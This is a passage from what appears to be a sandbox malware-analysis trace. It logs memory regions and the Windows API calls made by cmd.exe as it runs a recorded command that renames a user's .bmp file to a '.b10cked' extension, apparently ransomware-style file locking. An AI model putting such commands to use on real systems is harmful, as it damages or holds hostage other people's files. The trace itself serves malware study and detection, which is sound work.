0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33769 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 33770 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33771 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33772 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33773 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33774 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33775 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33776 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33777 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33778 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33779 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 33780 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
33781 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33782 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 33783 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 33784 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 33785 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 33786 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 33787 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 33788 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 812 os_tid = 0xef0 [0225.162] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe9c | out: lpSystemTimeAsFileTime=0x2afe9c*(dwLowDateTime=0xb9c48dc0, dwHighDateTime=0x1d440a9)) [0225.162] GetCurrentProcessId () returned 0xf74 [0225.162] GetCurrentThreadId () returned 0xef0 [0225.162] GetTickCount () returned 0x3e2b0 [0225.162] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe94 | out: lpPerformanceCount=0x2afe94*=28195141866) returned 1 [0225.163] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.163] __set_app_type (_Type=0x1) [0225.163] __p__fmode () returned 0x76b331f4 [0225.163] __p__commode () returned 0x76b331fc [0225.163] SetUnhandledExceptionFilter 
(lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.163] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.163] GetCurrentThreadId () returned 0xef0 [0225.164] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef0) returned 0x38 [0225.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.164] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.164] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.164] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.164] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afe2c | out: phkResult=0x2afe2c*=0x0) returned 0x2 [0225.164] VirtualQuery (in: lpAddress=0x2afe63, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.164] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.164] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.164] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.164] 
VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.164] GetConsoleOutputCP () returned 0x1b5 [0225.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.165] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.165] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.165] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.165] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.165] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.165] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.166] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.166] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.166] GetEnvironmentStringsW () returned 0x60198* [0225.166] FreeEnvironmentStringsW (penv=0x60198) returned 1 [0225.166] GetEnvironmentStringsW () returned 0x60198* [0225.166] FreeEnvironmentStringsW (penv=0x60198) returned 1 [0225.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed9c | out: phkResult=0x2aed9c*=0x40) returned 0x0 [0225.166] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0xc0, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.166] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | 
out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.166] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x0, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegCloseKey (hKey=0x40) returned 0x0 [0225.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed9c | out: phkResult=0x2aed9c*=0x40) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x4) 
returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x0, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x9, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x9, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x9, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegCloseKey (hKey=0x40) returned 0x0 [0225.167] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.167] srand (_Seed=0x5b8863b9) [0225.167] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"" [0225.167] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"" [0225.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.168] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x618f8, 
nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.168] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.168] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.168] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.168] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.168] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.168] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.168] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.168] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.169] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.169] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.169] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.169] GetEnvironmentStringsW () returned 0x622e8* [0225.169] FreeEnvironmentStringsW (penv=0x622e8) returned 1 [0225.169] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.169] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.169] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.169] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.169] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.169] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") 
returned 8 [0225.169] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.169] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.169] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.169] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afb68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afb68, lpFilePart=0x2afb64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afb64*="Desktop") returned 0x18 [0225.169] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.170] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af8e4 | out: lpFindFileData=0x2af8e4) returned 0x60028 [0225.170] FindClose (in: hFindFile=0x60028 | out: hFindFile=0x60028) returned 1 [0225.170] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af8e4 | out: lpFindFileData=0x2af8e4) returned 0x60028 [0225.170] FindClose (in: hFindFile=0x60028 | out: hFindFile=0x60028) returned 1 [0225.170] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af8e4 | out: lpFindFileData=0x2af8e4) returned 0x60028 [0225.170] FindClose (in: hFindFile=0x60028 | out: hFindFile=0x60028) returned 1 [0225.170] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.170] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.170] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.171] GetEnvironmentStringsW () returned 0x62b08* [0225.171] FreeEnvironmentStringsW (penv=0x62b08) returned 1 [0225.171] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.171] GetConsoleOutputCP () returned 0x1b5 [0225.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.171] GetUserDefaultLCID () returned 0x409 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afca8, cchData=128 | out: lpLCData="0") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afca8, cchData=128 | out: lpLCData="0") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afca8, cchData=128 | out: lpLCData="1") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.173] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.173] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 
[0225.173] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.173] GetConsoleTitleW (in: lpConsoleTitle=0x508f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.174] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.174] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.174] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.174] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.174] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.175] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.175] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.175] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.175] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.175] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.178] GetConsoleTitleW (in: lpConsoleTitle=0x2af9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.179] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.179] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.179] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.179] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.179] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.179] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.179] _wcsicmp (_String1="move", _String2="PAUSE") returned 
-3 [0225.179] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.179] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.179] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.179] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.179] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.179] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.179] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.179] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.179] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.179] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.179] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.180] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.180] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.180] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.180] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.180] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.180] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.180] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.180] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.182] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.182] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.182] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af75c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af754, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af754*=0x90c08a66, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp 
(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.184] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.184] _wcsicmp (_String1="65OAv.bmp", _String2=".") returned 8 [0225.184] _wcsicmp (_String1="65OAv.bmp", _String2="..") returned 8 [0225.184] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp")) returned 0x20 [0225.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x61e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.184] SetErrorMode (uMode=0x0) returned 0x0 [0225.184] 